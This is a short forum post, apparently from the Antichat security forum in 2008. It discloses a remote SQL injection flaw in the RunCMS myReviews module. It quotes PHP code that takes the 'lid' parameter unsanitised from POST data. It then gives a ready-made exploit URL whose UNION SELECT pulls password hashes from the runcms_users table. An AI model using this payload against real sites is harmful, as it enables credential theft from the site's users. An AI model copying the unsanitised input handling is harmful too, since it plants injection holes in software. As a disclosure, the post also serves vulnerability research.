30.04.2008, 21:27
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
RunCMS Module Reviews 2.00 (lid) Remote SQL Injection Vulnerability
Vuln code:
PHP код:
.....
global $xoopsConfig, $db, $HTTP_POST_VARS, $myts, $eh;
$lid = $HTTP_POST_VARS['lid'];
$title = $HTTP_POST_VARS['title'];
.....
Exploit:
Код:
/modules/myReviews/reviewbook.php?lid=-999991+union+select+pass+from+runcms_users
ZAMUT (c)
|
|
|